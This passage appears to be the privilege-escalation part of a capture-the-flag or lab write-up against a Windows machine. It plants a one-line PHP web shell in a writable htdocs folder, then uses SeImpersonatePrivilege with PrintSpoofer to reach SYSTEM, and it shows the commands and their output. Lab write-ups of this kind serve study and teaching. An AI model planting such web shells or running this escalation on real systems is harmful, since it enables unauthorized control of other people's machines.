Priv Escalation

There is also another user called apache. We also have write access to the htdocs folder which means that we can attempt to get code execution as that user apache.

I created a php file that to the htdocs folder where the other php files were.

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

After getting another shell as the apache user.

I enumerated the Privileges of the user apache.

C:\Users\apache>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

I used PrintSpoofer to get Administrator.

C:\Users\apache>PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system